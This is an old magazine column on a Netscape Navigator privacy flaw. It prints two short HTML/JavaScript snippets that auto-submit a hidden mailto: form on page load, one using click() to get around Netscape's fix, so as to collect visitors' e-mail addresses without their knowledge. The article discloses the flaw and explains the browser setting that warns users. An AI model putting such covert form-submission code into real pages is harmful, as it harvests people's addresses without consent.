Netscape introduces new 'privacy' bug

Thanks to Navigator 3.0's operative click() method, wiley Webmasters can again employ JavaScript to collect e-mail addresses of visitors without their knowledge

Netscape can be fanatic about security and privacy issues, even going as far as paying hackers a thousand dollars or more as a "Bugs Bounties" award if they manage to find serious security holes. To make sure they catch the big glitches before they become public, Netscape's own Q&A department runs security "fire drills" during the beta cycle of Navigator's development, in an effort to find ways that someone might exploit a hole, and obtain sensitive information from users.

Often it's the smaller, gopher-sized holes that escape the attention of the paid hackers and Netscape's security team. But these can be just as dangerous as the gaping bear pits you read about here and in the newspapers. For example, version 2.0 of Navigator was well out the door when it was discovered that a seeemingly bit of innocuous JavaScript code could enable any Web site administrator to collect e-mail names of all visitors. The code was as simple as this:

<BODY onLoad="document.hiddenform.submit()">
<FORM NAME="hiddenform" ACTION="mailto:anyone@nosuchplace.com" METHOD=post>
<INPUT TYPE="hidden" VALUE="hidden value here">
</FORM>
</BODY>

While this is not a security hole per se, it does expose users to misuse of their e-mail address, since their e-mail name can be gathered without their knowledge. One obvious application of collecting e-mail names is to build a database for unsoliticed mailings -- otherwise known as "spam." Along with some Java-related security problems experienced at the time, Netscape fixed this particular bug in an interim release of Netscape 2.0 by disallowing the mailto: protocol when used in connection with the submit() method for a form. The above script silently fails for users of Netscape 2.01 and above.

A little-known workaround for this "security fix" in Netscape 2.01 and later was to use the click() method to "remotely" activate a Submit button attached to the same form, or even another form. Fortunately, at least in the interest of the privacy of users, the click() method didn't work well -- if at all -- in most versions of Netscape 2.0x.

E-mail snatchers return

With Netscape 3.0, however, e-mail snatchers can take advantage of a fully functional click() method for form buttons. With an operative click() method, wiley Web administrators can once again attempt to collect e-mail addresses of visitors. A sample script looks like this:

<BODY onLoad ="document.hiddenform.subbutton.click()">
<FORM NAME="hiddenform" ACTION="mailto:anyone@nosuchplace.com" METHOD=post>
<INPUT TYPE="hidden" VALUE="hidden value here">
<INPUT TYPE="submit" VALUE="Click here to continue" NAME="subbutton">
</FORM>
</BODY>

Note that the Submit button is used and is visible in the document, but its text can be most anything. Creative hackers can also hide the button out of the way in other frames, to make it completely invisible. It is not necessary to physically click the Submit button to send the hidden mail.

This resurfacing of the old problem of e-mail snatching would be a serious issue had Netscape 3.0 also not included a security check for any attempt to send mail via a form. Users can choose to be forewarned that a "hidden" e-mail is about to be sent, and cancel the request if they wish. This option can be set by chosing Options, Network Preferences, and selecting the Protocols tab. Enable or disable the "Submitting a Form by Email" option as you choose. Do note that if you disable this option, the hidden mail -- with the e-mail address you have provided in your Netscape preferences -- is sent without first checking with you. Be sure this is what you want to do!

If you don't wish to broadcast your e-mail name to just any Web site you visit, and don't want to provide a phony name in the Mail & News Preferences dialog box, you'll probably want to keep the "Submitting a Form by Email" option enabled at all times. This will help protect your identity during your Web wanderings to a certain degree.

Gordon McComb is an author, consultant, and lecturer. He has written 50 books and more than a thousand magazine articles during his 20 years as a professional writer. More than a million copies of his books are in print. Gordon also writes a weekly syndicated newspaper column on computers, reaching several million readers worldwide. Gordon's latest book is The JavaScript Sourcebook, available from Wiley Computer Publishing.

Learn more about this topic